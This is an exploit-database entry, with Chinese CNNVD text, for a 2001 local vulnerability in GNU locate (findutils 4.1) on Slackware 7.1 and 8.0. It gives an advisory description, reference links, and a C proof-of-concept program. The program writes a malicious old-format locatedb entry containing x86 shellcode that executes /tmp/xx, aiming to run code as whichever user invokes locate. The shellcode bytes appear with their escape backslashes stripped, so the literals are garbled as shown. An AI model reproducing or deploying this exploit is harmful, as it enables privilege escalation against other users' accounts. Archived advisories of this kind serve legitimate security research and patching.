https://www.exploit-db.com/exploits/21043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-173

Slackware7.1和8.0上的findutils4.1的GNUlocate存在漏洞。本地用户可以借助原有规格化数据库（locatedb）文件名获取权限，其中包含带有out-of-range偏移的一个条目，该漏洞可能导致locate写入任意内存进程。

source: http://www.securityfocus.com/bid/3127/info

GNU locate is an application that searches file databases for file names that match user-supplied patterns.

A boundary condition error can occur when the program reads database files composed in an "old" format, produced by GNU locate prior to version 4.0 and by Unix versions of locate and find. If an attacker is able to write a malicious entry to a database file used by other users, the attacker could cause arbitrary code to be executed by another user when the user runs the locate program.

It also should be noted that in earlier versions of Slackware(circa 3.5) the file is written by the superuser. 

#include <stdio.h>

char shellcode[] =
   "xebx18x5ex89x76x08x31xc0x88x46x07x89x46"
   "x0cx89xf3x8dx4ex08x8dx56x0cxb0x0bxcdx80"
   "xe8xe3xffxffxff/tmp/xx";
char putshell[] =
   "x14x84x85x86x87x88x89x8ax8bx8c"
   "x8dx8ex8fx90x91x92x93x94x95x96";

int main(void)
{
   int i;
   int z0=0; int addr=0x0804a970;
   int z1=0; int addr2=-626;
   int z2=0; int addr3=addr+6;
   printf("%s", &addr);
   printf("%s", &addr3);
   printf("%s",shellcode);
   fflush(stdout);
   for(i=46;i<256;i++) putchar('A');
   printf("%s", putshell);
   fflush(stdout);
   putchar(0);
   putchar(30);
   printf("%s", &addr2);
   printf("x82x83");
   fflush(stdout);
}

来源:XF
名称:locate-command-execution(6932)
链接:http://xforce.iss.net/static/6932.php
来源:BID
名称:3127
链接:http://www.securityfocus.com/bid/3127
来源:BUGTRAQ
名称:20010801Slackware8.0,7.1Vulnerability:/usr/bin/locate
链接:http://www.securityfocus.com/archive/1/200991
来源:OSVDB
名称:5477
链接:http://www.osvdb.org/5477